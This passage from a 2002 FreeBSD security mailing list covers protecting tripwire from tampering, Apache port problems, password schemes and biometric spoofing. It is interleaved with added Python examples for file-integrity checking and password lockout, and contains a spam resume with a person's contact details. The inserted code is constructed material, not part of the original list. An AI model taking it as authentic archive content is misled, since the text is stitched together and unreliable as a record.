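    return {"first": first, "replay": replay, "second": second,
            "wrong": wrong, "remaining": server.users["alice"]["seq"]}


if __name__ == "__main__":
    print(demo())
```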
From owner-freebsd-security Wed Jun 19 02:50:56 2002
Date: Wed, 19 Jun 2002 11:50:43 +0200
From: Maxlor
To: freebsd-security@FreeBSD.ORG
Subject: Re: preventing tampering with tripwire
Message-ID: <2799555.1024487443@[10.0.0.16]>
In-Reply-To: <27700541.1024450071@[10.0.0.16]>

Thank you guys for your answers. Let me just comment on a few things:

Putting the tripwire binary on an external, read-only drive doesn't help. As I mentioned, an attacker who gained root could simply unmount the disk and place a tampered copy into the mountpoint dir. I would only notice this if I happened to have a closer look at df *and* the attacker was nice enough not to modify df too.

Similar with making MD5 hashes of the tripwire binary. The MD5 program could be modified to always generate the same hash for tripwire. Using an external machine for generating and saving the hashes would be ok, but this would either require handwork (create an ssh connection, start the hashing), or somehow making the file system available to this machine, which would imo create a bigger security hole than it tries to cover.

Making the whole system read-only would help, alas it's not possible since I actually need to use my machine :-)

Having some tools (tripwire, MD5) on a floppy, and mounting and checking the files by hand would work, imo. Only problem is that this adds quite a bit of inconvenience, which would lead to me not doing it anymore when I get tired of it. I mean, it's simple - I just want a tripwire report in my Inbox when I wake up in the morning :-).

So, what I did so far is this:

- Setting the schg flag for /usr/local/sbin/tripwire, /etc/crontab and /usr/sbin/cron. I set the flag for the cron files too so an attacker doesn't just delete the crontab entry and add 'cat fakereport.txt' in its place :).

- Change kern.securelevel to 1. This prevents modifying any file which has the schg flag set. The securelevel cannot be lowered without a reboot. I've got to think a bit about how to prevent a lowering through rebooting... maybe schg'ing /etc/rc and /etc/rc.conf?

I actually went so far as to schg /sbin, /bin, /usr/sbin and /usr/bin. These will only be changed on a make world, and I need to drop to single user mode for that anyway, so no inconvenience should be created through this while my executables gain some reliability.

Why do I like this solution a lot? Even if my system was rooted, and the attacker had enough skills to replace each binary with a compromised version that would look the same to me, he couldn't do so without dropping to single user mode. And since he'd have to have physical access to the machine for that, I think I can say the machine gained some reasonable security against rootkits overall.

Thanks again for all your thoughts.

Greetings
Maxlor
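The nightly tripwire-style check Maxlor wants, as an added example that is not from this thread and not tripwire's code: build a baseline of every regular file under a set of directories (size, permission bits, SHA-256), store it, and later diff the live tree against it. The fake bin tree, file names and contents are constructed for the demo. Note that the checker, its interpreter and the baseline file are themselves part of the trusted base, which is exactly what the schg/securelevel discussion is about protecting.

```python
import hashlib
import json
import tempfile
from pathlib import Path

CHUNK = 1 << 16


def file_digest(path: Path) -> str:
    """SHA-256 hex digest of a file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(roots) -> dict:
    """Map absolute path -> {size, mode, sha256} for each regular file below roots."""
    baseline = {}
    for root in roots:
        for p in sorted(Path(root).rglob("*")):
            if p.is_symlink() or not p.is_file():
                continue  # directories and symlinks are not hashed here
            st = p.lstat()
            baseline[str(p.resolve())] = {
                "size": st.st_size,
                "mode": st.st_mode & 0o7777,
                "sha256": file_digest(p),
            }
    return baseline


def save_baseline(baseline: dict, path: Path) -> None:
    """Write the baseline; in practice this file lives on read-only or offline media."""
    path.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(path: Path) -> dict:
    return json.loads(path.read_text())


def verify(baseline: dict, roots) -> dict:
    """Rescan roots and report files that were added, removed or changed since the baseline."""
    current = build_baseline(roots)
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": sorted(p for p in common if baseline[p] != current[p]),
    }


def demo() -> dict:
    """Constructed scenario: a fake bin tree, a baseline, then three kinds of tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = Path(tmp) / "bin"
        bindir.mkdir()
        for name in ("ls", "ps", "netstat"):
            (bindir / name).write_bytes(b"#!/bin/sh\necho " + name.encode() + b"\n")
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(build_baseline([bindir]), baseline_file)

        # ps swapped for a same-size replacement (size alone would not catch it),
        # an extra file dropped in, netstat deleted.
        (bindir / "ps").write_bytes(b"#!/bin/sh\necho PS\n")
        (bindir / "extra").write_bytes(b"#!/bin/sh\n")
        (bindir / "netstat").unlink()

        report = verify(load_baseline(baseline_file), [bindir])
        # Return basenames so the result does not depend on the temp directory name.
        return {k: [Path(v).name for v in vs] for k, vs in report.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```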
From owner-freebsd-security Wed Jun 19 04:48:05 2002
Message-ID: <222150-220026319114438290@UnitedStates.com>
From: ""
To: "security@freebsd.org"
Subject: Resume - United States
Date: Wed, 19 Jun 2002 08:44:38 -0300

GOOD MORNING !!

PLEASE FORWARD MY RESUME TO THE HUMAN RESOURCES AREA AND CONTACT ME BY TELEPHONE. MARKETING - dperegalli@hotmail.com

Thank you in advance,

Domingo Peregalli Abella
dperegalli@hotmail.com
2495 Briarcliff Rd
Atlanta, GA- 30329
(404) 679-5662
dperegalli@hotmail.com

OBJECTIVE
A position in Marketing to enhance my academic education in order to grow professionally.

PROFESSIONAL EXPERIENCE
Solid experience in sales, project management, strategic planning and management of business units. International experience, mainly in Brazil, but also abroad. Leadership, communications and negotiation skills, can adapt to new functions and markets. Strategic vision which allows me to change paradigms under different environments.

WORK EXPERIENCE

AT&T, May 2001 - January 2002
Bilingual account representative responsible for handling 80-90 inbound and outbound calls a day. Notified the customers about new products and services that AT&T has to offer. Quickly closed the sales process using the pre-defined strategies. Full participation on the management project to find out if we were reaching our objectives.

Looking4.com.br, March 2000 - February 2001
Responsible for the area of business resources, bids, RFPs, sales, marketing, development of products and emerging markets for looking4. Organized the sales team and implemented policies and processes for sales as well as different strategies for e-marketing. Completed several projects involving the creation, promotion and implementation of new services for looking4.com. I increased market share and achieved, with the team, the pre-defined strategic objectives.

BCP Telecommunications, January 1998 - March 2000
This is a private company in the area of Wireless Telephony in Sao Paulo, Brazil. Worked in Marketing, as a Business Consultant in the area of promotions and corporate sales. Received several promotions while participating in conjunction with leaders in the industry of the Brazilian Market. These promotions involved the marketing of products, brand consolidation and contributed to the recognition of BCP as an emerging new company. As such, we reached our target of two million, three hundred thousand customers in two years.

Bioservice WRP-Johnson & Johnson Brazil, June 1996 - January 1998
Served as a commercial representative and responsible for the restructuring of a small sales team. Introduced new processes in sales and marketing as well as diversifying the segments. Created an emerging markets plan with objectives and targets not only for the Brazilian Market but foreign markets as well. These included Chile, Argentina and Bolivia.

EDUCATION
Bachelor of Social Sciences, Major in International Relations
University: Pontificia Catolica de Sao Paulo, Brazil
AA in Marketing
ORT University, Montevideo, Uruguay

LANGUAGES
Fluent in Spanish. (Native of Uruguay)
Fluent in Portuguese. (Lived in Brazil from 1996-2000)
English. San Francisco University (Center for English Studies/TOEFL)

OTHERS
Office 2000
Internet

SPANISH !!

Domingo Peregalli Abella
2495 Briarcliff Rd
Atlanta, GA- 30329
(404) 679-5662

OBJECTIVE
To add Marketing concepts to my academic background and thus develop myself professionally.

PROFESSIONAL EXPERIENCE
Solid experience in a series of roles in the areas of sales, project management, marketing, product management, strategic planning and general management of business units. International experience, leadership ability, negotiation and communication skills, adaptation to new roles and markets, a strategic vision that allows me to change paradigms in different business segments.

WORK EXPERIENCE

AT&T, May 2001 - Present
Bilingual account representative, responsible for customer service, informing customers about new products and services that AT&T has to offer. Fast closing of the sales process using the pre-defined strategies. Full management participation in the project to identify the objectives and whether they were being met by the sales team.

Looking4.com.br, March 2000 - February 2001
Responsible for sales, marketing, creation of products and emerging markets for looking4. I organized the sales team and implemented sales policies and processes as well as different strategies for e-marketing. I completed various projects involving the creation, promotion and implementation of new services for looking4.com. I increased market share and met, together with the team, the pre-established sales objectives.

BCP Telecomunicaciones, January 1998 - March 2000
A private company in the cellular telephony area in Sao Paulo, Brazil. I worked in Marketing, as a Business Consultant in the promotions and corporate sales sector. I received various promotions alongside leading companies in the industry in the Brazilian market. These promotions included product marketing and brand consolidation, and I contributed to the recognition of BCP as a new and emerging company. As such, we reached our objective of two million three hundred thousand customers in two years.

Johnson & Johnson Brazil, June 1996 - January 1998
I served as a commercial representative and was responsible for restructuring a small sales team. I implemented new processes in sales and marketing and also diversified the segments. I helped create and implement a potential market plan with objectives and strategies not only for the Brazilian market but also for the international market; this included Chile, Argentina and Bolivia.

EDUCATION
University of Social Sciences, Bachelor's degree in International Relations
University: Pontificia Catolica de Sao Paulo, Brazil
ORT University of Uruguay, Bachelor's degree in Marketing

LANGUAGES
Fluent in Spanish (Native of Uruguay)
Fluent in Portuguese (Lived in Brazil from 1996-2000)
English. San Francisco University (Center for English Studies/TOEFL)

OTHERS
Office 2000
Internet

From owner-freebsd-security Wed Jun 19 05:18:26 2002
Date: Wed, 19 Jun 2002 05:18:11 -0700 (PDT)
From: Jason Stone
To: Maxlor
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: preventing tampering with tripwire
In-Reply-To: <2799555.1024487443@[10.0.0.16]>
Message-ID: <20020619050434.Q19920-100000@walter>

> Why do I like this solution a lot? Even if my system was rooted, and
> the attacker had enough skills to replace each binary with a
> compromised version that would look the same to me, he couldn't do so
> without dropping to single user mode. And since he'd have to have
> physical access to the machine for that, I think I can say the machine
> gained some reasonable security against rootkits overall.

A couple of random thoughts:

1) All the 31337 rootkits use kld's and don't bother with trojans, and, as has already been pointed out on this list, /modules/* are _not_ set schg by default.

2) FYI, at least two independent groups have implemented the equivalent of tripwire in the kernel - the kernel does something like read in the sha1 sums at boot time and then every time a binary is run, its sha1 is computed and, if it doesn't match the in-memory sha1 from boot time, the binary will not be run. http://www.trojanproof.org/ is one project and the other I don't remember, but a quick slashdot or google search would turn it up I'm sure.

-Jason

-----------------------------------------------------------------------
I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?"
-- Mike Godwin

From owner-freebsd-security Wed Jun 19 05:31:48 2002
Message-ID: <3D1079D3.2BCF833F@FreeBSD.org>
Date: Wed, 19 Jun 2002 15:32:19 +0300
From: Maxim Sobolev
Organization: Vega International Capital
To: nectar@FreeBSD.org
Cc: security@FreeBSD.org, Alexandr Kovalenko
Subject: [Fwd: Russian Apache is not vulnerable to recent DoS]

Redirect to a proper place.

-------- Original Message --------
Subject: Russian Apache is not vulnerable to recent DoS
Date: Wed, 19 Jun 2002 15:01:11 +0300
From: Alexandr Kovalenko
To: freebsd-ports@FreeBSD.org

Russian Apache is not vulnerable to the recent Apache vulnerability,
because it does not use the code which causes it. Please remove
FORBIDDEN from russian/apache13 and russian/apache13-ssl.

Thank you.

--
NEVE-RIPE
Ukrainian FreeBSD User Group
http://uafug.org.ua/

From owner-freebsd-security Wed Jun 19 6:16:26 2002
Message-ID: <3D108570.70409@potentialtech.com>
Date: Wed, 19 Jun 2002 09:21:52 -0400
From: Bill Moran
To: Ryan Thompson
Cc: freebsd-security@freebsd.org
Subject: Re: Password security
References: <20020618204711.I65632-100000@ren.sasknow.com>

There were a lot of excellent responses, I'm going to add my $.02.
Hopefully it will be helpful.

Ryan Thompson wrote:
> My staffers are using plain old passwords for logins. ALL logins are
> via SSH from various platforms, using passwords. Some are logging in
> from Windows clients that don't support much else. And, on the
> security/convenience continuum, I won't have much of a network to
> secure if nobody gets any work done. :-)
>
> I'm well aware of the inherent insecurity of what your average human
> can remember. It's currently a weak link for us, so it is one aspect
> of our security that I would like to improve. So, for the purposes of
> this message, please assume all other avenues have been secured. ;-)

There are some tricks to improve the "average human's" memory. Poetry
is one of them. Most people can memorize a few lines of poetry (or a
song) rather easily. Increase the length of their passwords to 10+ and
then tell them how to generate them: Take a line of poetry or a line
from a song and make an acronym from it.

For example, I had to memorize a silly poem in 6th grade that I have
never been able to forget:

"The reason for the Pelican is difficult to see
His beak is clearly larger than there's any need to be"

The poem is actually much longer (and I remember the whole flippin
thing), but just those two lines give me "trftpidtshbiclttantb" as a
password, 20 characters, and while I don't know for sure, it would seem
to me that there's more entropy in that than in any "word" password.
Most people already have dozens of songs memorized, so it works.

This is more of a "stupid human trick" than brave new technology, but
it may be helpful to you.

> The best I've come up with so far is to issue random passwords, from
> an array of 68 possible characters (alpha num and some easily-typed
> symbols). I issue two passwords for each user. One is short enough to
> be remembered with a small effort (6 characters, entropy > 2^36,
> assuming my randomizer is up to par). The second password is longer
> (10 characters, > 2^60), and is designed to be printed on a small card
> that the user carries with them like a token or a key. Obviously, you
> could argue the merits of shorter vs. longer keys. My choices are
> still quite arbitrary at this stage. New passwords would be issued at
> regular intervals. (Remember, these are staff members. I can do that.
> :-)

Actually, that's an excellent procedure. Looks like you've already
done most of your homework.

I'm assuming that you've already looked into these other issues, but
just in case:
Monitor everything.
Disable accounts that experience x successive unsuccessful logins.

Obviously, you have some *serious* security concerns.

> So, the idea is that a much better overall entropy is obtained, like
> using a secret password plus a physical key. The unlikely worst case:
> an attacker knows this system (password length and character set),
> physically mugs a user, is able to obtain the system password hash,
> AND has the resources to brute force the remaining 6 character
> remembered secret. This still gives the staff member several hours to
> change his or her password if he/she suspects the key was compromised.

I wouldn't be worried about folks getting mugged, so much as someone
being lazy with the security of their system password hash. In this
case, an account disabling policy will help, because the account will
be disabled before the cracker can brute force it.

Many folks will expose their password to others out of laziness and
never really notice it. (Just do an experiment and stand behind 5
people while they're logging in and see how many actually hide what
they're typing from you.)

Another issue is user education. If security is that critical to your
network, I would implement a mandatory user education program. Use it
to:
1. Explain what's going on and how it works.
2. Instruct on best practices.
3. Scare the crap out of them.

> I know that people *want* to re-use their favorite dictionary
> password(s)... so there will be *some* resistance to a system like the
> above...

You might be able to use the poetry method above to ease things.

> I'm not really interested in a "passwords are bad" debate, unless
> there are readily available technologies of which I'm not aware that
> can be deployed across many dumb insecure computers across an insecure
> network.

Passwords are fine, users are bad ;)

--
Bill Moran
Potential Technologies
http://www.potentialtech.com

From owner-freebsd-security Wed Jun 19 6:52:13 2002
Date: Wed, 19 Jun 2002 08:51:56 -0500
From: "Jacques A. Vidrine"
To: Maxim Sobolev
Cc: security@FreeBSD.org, Alexandr Kovalenko, demon@FreeBSD.org, lev@serebryakov.spb.ru
Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS]
Message-ID: <20020619135156.GA19379@madman.nectar.cc>
References: <3D1079D3.2BCF833F@FreeBSD.org>
In-Reply-To: <3D1079D3.2BCF833F@FreeBSD.org>

On Wed, Jun 19, 2002 at 03:32:19PM +0300, Maxim Sobolev wrote:
> Redirect to a proper place.

Thanks, Maxim!

> -------- Original Message --------
> Subject: Russian Apache is not vulnerable to recent DoS
> Date: Wed, 19 Jun 2002 15:01:11 +0300
> From: Alexandr Kovalenko
> To: freebsd-ports@FreeBSD.org
>
> Russian Apache is not vulnerable to recent apache vulnerability,
> because
> it does not use code, which causes it. Please, remove FORBIDDEN from
> russian/apache13 and russian/apache13-ssl.

Do you have a pointer to an analysis that leads to this conclusion?

If the maintainers are convinced, then they can remove FORBIDDEN.
I'm cc:ing them so that they are in the loop.

Cheers,
--
Jacques A. Vidrine                    http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Wed Jun 19 7:20:33 2002
Message-ID: <3D109329.8050007@tenebras.com>
Date: Wed, 19 Jun 2002 07:20:25 -0700
From: Michael Sierchio
To: Dag-Erling Smorgrav
Cc: Eric F Crist, 'Ryan Thompson', freebsd-security@FreeBSD.ORG
Subject: Re: Password security
References: <000c01c2174c$5a38f230$77fe180c@armageddon>

Dag-Erling Smorgrav wrote:
> 1) Biometrics can't be used reliably for remote access.

There are zero-knowledge protocols for secure remote use of
biometric data.

> 2) I don't know of any currently available biometric authentication
> device that can't be easily fooled.

Somewhat misleading -- any biometric method of identification
has false positives and false negatives. For software engineers,
this seems unacceptable, since we're used to boolean values
for Truth.

It's very useful for two-factor (or n-factor) authentication --
I have no idea how extensive your familiarity with biometric
methods is, but several are quite promising. Some of the better
ones (hand geometry) aren't suited to embedding in a laptop...
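The password-issuing scheme Ryan described earlier in this thread (a 68-symbol alphabet, a 6-character memorised secret plus a 10-character secret carried on a card, with the entropy figures he quotes) and Bill's rule of disabling an account after x successive failed logins, worked through as an added Python example. This is not code from the list or from any of the posters; the exact six symbols that round the alphabet out to 68, the sshd-style log lines, the host name and the user names are all constructed assumptions.

```python
"""Added example: issue random passwords per the scheme discussed in this
thread, compute their entropy, and apply a successive-failure lockout rule
to sshd-style auth log lines.  Not code from the list; the alphabet's
symbol set, log lines, host name and users are constructed."""
import math
import re
import secrets
import string
from collections import defaultdict

# The post only gives the alphabet size ("68 possible characters (alpha num
# and some easily-typed symbols)"), so the six symbols chosen here are an
# assumption: 52 letters + 10 digits + 6 symbols = 68.
ALPHABET = string.ascii_letters + string.digits + "!@#$%&"


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Entropy in bits of a uniformly random password: length * log2(alphabet).
    6 chars of 68 give ~36.5 bits, 10 chars ~60.9 bits, matching the
    "> 2^36" and "> 2^60" figures quoted in the thread."""
    return length * math.log2(alphabet_size)


def issue_password(length):
    """Draw a uniformly random password from the OS CSPRNG.  secrets.choice
    is unbiased over the alphabet; the seeded random module is not suitable
    here (this is the "assuming my randomizer is up to par" caveat)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def issue_pair():
    """Two passwords per user, as in the quoted scheme: a 6-character
    memorised secret and a 10-character secret printed on a card."""
    return issue_password(6), issue_password(10)


# Constructed sshd-style auth log lines used to exercise the lockout rule.
SAMPLE_LOG = [
    "Jun 19 08:12:01 host sshd[1234]: Failed password for alice from 10.0.0.5 port 51022 ssh2",
    "Jun 19 08:12:07 host sshd[1234]: Failed password for alice from 10.0.0.5 port 51022 ssh2",
    "Jun 19 08:12:30 host sshd[1240]: Accepted password for alice from 10.0.0.5 port 51023 ssh2",
    "Jun 19 08:14:02 host sshd[1251]: Failed password for bob from 10.0.0.9 port 40110 ssh2",
    "Jun 19 08:14:09 host sshd[1251]: Failed password for bob from 10.0.0.9 port 40110 ssh2",
    "Jun 19 08:14:15 host sshd[1251]: Failed password for bob from 10.0.0.9 port 40110 ssh2",
    "Jun 19 08:15:40 host sshd[1260]: Failed password for invalid user carol from 10.0.0.9 port 40111 ssh2",
    "Jun 19 08:15:44 host sshd[1260]: Failed password for invalid user carol from 10.0.0.9 port 40111 ssh2",
    "Jun 19 08:15:49 host sshd[1260]: Failed password for invalid user carol from 10.0.0.9 port 40111 ssh2",
    "Jun 19 08:16:10 host sshd[1263]: Failed password for alice from 10.0.0.5 port 51030 ssh2",
]

# Matches both "Failed password for bob from ..." and the
# "Failed password for invalid user carol from ..." variant.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+)"
)


def accounts_to_disable(log_lines, max_failures):
    """Bill's rule: flag an account once it shows max_failures *successive*
    failed logins.  A successful login resets that account's streak, so
    occasional typos do not accumulate.  Returns the set of flagged users."""
    streak = defaultdict(int)
    flagged = set()
    for line in log_lines:
        m = AUTH_RE.search(line)
        if m is None:
            continue                      # unrelated log line
        outcome, user, _source = m.groups()
        if outcome == "Failed":
            streak[user] += 1
            if streak[user] >= max_failures:
                flagged.add(user)
        else:
            streak[user] = 0
    return flagged


if __name__ == "__main__":
    short, long_ = issue_pair()
    print(f"memorised: {short}  ({entropy_bits(6):.1f} bits)")
    print(f"card:      {long_}  ({entropy_bits(10):.1f} bits)")
    print("disable after 3 failures:", sorted(accounts_to_disable(SAMPLE_LOG, 3)))
```

On the constructed log above, a threshold of 3 flags only bob and carol: alice fails twice, logs in successfully (which resets her streak) and then fails once more, so she never reaches three in a row. Lowering the threshold to 2 flags her as well, which is the trade-off the threshold x encodes.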
From owner-freebsd-security Wed Jun 19 7:38:15 2002
Message-ID: <3D109786.F6CC57B7@FreeBSD.org>
Date: Wed, 19 Jun 2002 17:39:02 +0300
From: Maxim Sobolev
Organization: Vega International Capital
To: "Jacques A. Vidrine"
Cc: security@FreeBSD.org, Alexandr Kovalenko, demon@FreeBSD.org, lev@serebryakov.spb.ru
Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS]
References: <3D1079D3.2BCF833F@FreeBSD.org> <20020619135156.GA19379@madman.nectar.cc>

"Jacques A. Vidrine" wrote:
>
> On Wed, Jun 19, 2002 at 03:32:19PM +0300, Maxim Sobolev wrote:
> > Redirect to a proper place.
>
> Thanks, Maxim!
>
> > -------- Original Message --------
> > Subject: Russian Apache is not vulnerable to recent DoS
> > Date: Wed, 19 Jun 2002 15:01:11 +0300
> > From: Alexandr Kovalenko
> > To: freebsd-ports@FreeBSD.org
> >
> > Russian Apache is not vulnerable to recent apache vulnerability,
> > because
> > it does not use code, which causes it. Please, remove FORBIDDEN from
> > russian/apache13 and russian/apache13-ssl.
>
> Do you have a pointer to an analysis that leads to this conclusion?

Some information is available here:
http://www.lucky.net/~netch/tmp/apache-chunking-bugtraq.txt.

-Maxim

>
> If the maintainers are convinced, then they can remove FORBIDDEN.
> I'm cc:ing them so that they are in the loop.
>
> Cheers,
> --
> Jacques A. Vidrine                    http://www.nectar.cc/
> NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
> jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Wed Jun 19 7:58:53 2002
To: Michael Sierchio
Cc: Eric F Crist, 'Ryan Thompson', freebsd-security@FreeBSD.ORG
Subject: Re: Password security
References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 16:58:43 +0200
In-Reply-To: <3D109329.8050007@tenebras.com>

Michael Sierchio writes:
> Dag-Erling Smorgrav wrote:
> > 1) Biometrics can't be used reliably for remote access.
> There are zero-knowledge protocols for secure remote use of
> biometric data.

Most fingerprint scanners don't even encrypt the data they send to the
computer they're connected to.

> > 2) I don't know of any currently available biometric authentication
> > device that can't be easily fooled.
> Somewhat misleading -- any biometric method of identification
> has false positives and false negatives. For software engineers,
> this seems unacceptable, since we're used to boolean values
> for Truth.

When "false positives" includes reliably identifying a laptop showing
an AVI of a talking person (for one facial recognition system I know
of) or a plastic bag filled with warm water (for one fingerprint
scanner I know of) as the rightful user, they fall under my definition
of "useless". I know of two independent studies in which all the
biometric devices tested (about a dozen in each study, with some
overlap) were fooled with very simple means.

The only biometric authentication system I trust (to some degree,
anyway) is the human brain.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jun 19 8:09:08 2002
Message-ID: <3D109F35.9080106@ebizlab.hit.bme.hu>
Date: Wed, 19 Jun 2002 17:11:49 +0200
From: Bognar Attila
To: Michael Sierchio
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com>

Hi,

> It's very useful for two-factor (or n-factor) authentication --
> I have no idea how extensive your familiarity with biometric
> methods is, but several are quite promising. Some of the better
> ones (hand geometry) aren't suited to embedding in a laptop...

The fact that biometric scanners are getting better and better does
not mean that the applications using biometrics are good enough. There
are two big problems: privacy and the fact that you have only 10
fingers, 2 hands... (the biometric patterns are quite "precious", they
should be handled with _very_ big care - an encrypted channel is far
from being a solution for other than trivial problems).

attila

ps: hand geometry based identification is not one of the best
biometric methods for security critical applications (where uniqueness
should be very important)

From owner-freebsd-security Wed Jun 19 8:24:29 2002
Date: Wed, 19 Jun 2002 11:24:15 -0400
From: "Peter C. Lai" To: Jan Lentfer Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org Subject: Re: Apache 1.3.26 port Message-ID: <20020619112415.A55069@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <1024460049.2166.6.camel@jan-linnb.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1024460049.2166.6.camel@jan-linnb.lan>; from Jan.Lentfer@web.de on Wed, Jun 19, 2002 at 06:14:08AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org did you use portupgrade to upgrade? portupgrading apache13 will overwrite /usr/local/www and this PR can be seen at http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/36804 On Wed, Jun 19, 2002 at 06:14:08AM +0200, Jan Lentfer wrote: > Hi, > > i am new to this list, so I don't know if this is the right place for my > comment, so please be gentle ;-) > > After reading all the mail about the apache vulnerability, today I > installed the new 1.3.26 port. The compilation, etc. went clean, I also > had to reinstall mod_php4 and mod_fastcgi until I could make apache > start. Then I found that all my subdirectories in /usr/local/data/www > were gone (deleted)!! Luckily this was on my private machine! Is this a > normal behaviour? Anyway, it's good I know it now so I will for sure > backup the directorires on my production machines > > > Regards, > > Jan Lentfer > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. 
of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:32:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0A07A37B408; Wed, 19 Jun 2002 08:32:21 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 8B31AD; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5JFWKJI039708; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5JFWKHb039707; Wed, 19 Jun 2002 10:32:20 -0500 (CDT) Date: Wed, 19 Jun 2002 10:32:20 -0500 
From: "Jacques A. Vidrine" To: Maxim Sobolev Cc: security@FreeBSD.org, Alexandr Kovalenko , demon@FreeBSD.org, lev@serebryakov.spb.ru Subject: Re: [Fwd: Russian Apache is not vulnerable to recent DoS] Message-ID: <20020619153220.GA39647@madman.nectar.cc> References: <3D1079D3.2BCF833F@FreeBSD.org> <20020619135156.GA19379@madman.nectar.cc> <3D109786.F6CC57B7@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D109786.F6CC57B7@FreeBSD.org> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 19, 2002 at 05:39:02PM +0300, Maxim Sobolev wrote: > Some information is available here: > http://www.lucky.net/~netch/tmp/apache-chunking-bugtraq.txt. Ah, I had missed that message. Thanks for the pointer. I haven't seen a response yet. If I get time I will look at it myself, but I am loathe to `de-FORBIDDEN' it with the current information. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 8:34:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 37D2937B40A; Wed, 19 Jun 2002 08:34:38 -0700 (PDT) Received: from [80.129.121.242] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KhTh-00069h-00; Wed, 19 Jun 2002 17:34:37 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 3D06626B; Wed, 19 Jun 2002 17:34:35 +0200 (CEST) Received: by floundjan.homeip.net (Postfix on FreeBSD 4.5, from userid 80) id 13ED1E0; Wed, 19 Jun 2002 17:34:32 +0200 (CEST) Received: from 192.168.0.26 ( [192.168.0.26]) as user jan@localhost by www-mail.lan with HTTP; Wed, 19 Jun 2002 17:34:31 +0200 Message-ID: <1024500871.3d10a487acc8e@www-mail.lan> Date: Wed, 19 Jun 2002 17:34:31 +0200 
From: Jan Lentfer
Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org
Subject: Re: Apache 1.3.26 port
References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net>
In-Reply-To: <20020619112415.A55069@cowbert.2y.net>

Quoting "Peter C. Lai":

> did you use portupgrade to upgrade?

No, just "make all install clean"

Jan

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/

From owner-freebsd-security Wed Jun 19 8:39:59 2002
To: Michael Sierchio
Cc: Eric F Crist, 'Ryan Thompson', freebsd-security@FreeBSD.ORG
Subject: Re: Password security
References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 17:39:52 +0200

Dag-Erling Smorgrav writes:
> [...] I know of two independent studies in which all the
> biometric devices tested (about a dozen in each study, with some
> overlap) were fooled with very simple means.

Here's a transcript of one of them:

